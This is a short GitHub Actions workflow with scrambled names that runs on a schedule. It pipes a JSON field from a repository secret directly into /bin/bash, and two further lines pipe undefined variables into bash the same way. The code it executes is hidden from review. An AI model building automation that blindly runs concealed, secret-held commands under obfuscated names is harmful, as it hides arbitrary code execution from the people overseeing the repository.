name: zhenguokuduo
on:
  workflow_dispatch:

  schedule:
    - cron: '31 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhenguokuduo
        env:
          z5: ${{ secrets.z5 }}
        run: |
          printf '%s' "$z5" | jq -r .l62 | /bin/bash
          printf '%s' "$voyrb06660" | jq -r .trzim23457 | /bin/bash
          echo $d00506 | jq -r .csele231 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: FEW1FDVp
          path: "*.zip"
          retention-days: 1
